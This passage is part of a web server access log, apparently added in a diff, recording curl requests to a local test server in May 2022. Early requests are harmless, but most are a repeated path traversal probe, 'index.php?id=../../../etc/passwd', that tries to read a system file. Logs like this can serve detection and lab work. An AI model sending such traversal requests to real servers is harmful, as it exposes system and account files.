HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:55 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:56 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:56 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.037","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:57 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:57 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:58:01 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:02:59 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:19:17 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:28 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:29 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:30 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:31 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.037","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:31 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:31 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:31 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:32 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:32 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:08:20:34 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET /dedede/dedededede HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.257","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:01:34 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.035","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:01:58 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.170","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:01:59 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.048","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:00 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:00 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:00 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:02 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:02 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:02 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.038","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:03 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:04 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:04 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:04 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:05 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:06 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:06 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:07 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:07 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:08 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:08 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:08 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:09 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:09 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:44 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:44 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.040","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:44 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:45 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:45 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:46 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.039","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:47 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:47 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:47 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:48 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:48 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:48 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:48 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:48 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:49 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:49 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:49 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:49 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:49 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:50 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:50 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:50 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:50 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:50 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:50 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:51 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:51 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:51 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:51 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:51 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:52 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:52 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:52 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:52 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:52 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:53 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:53 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:53 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:53 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:53 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:53 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:54 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:54 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:54 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:54 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:54 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd 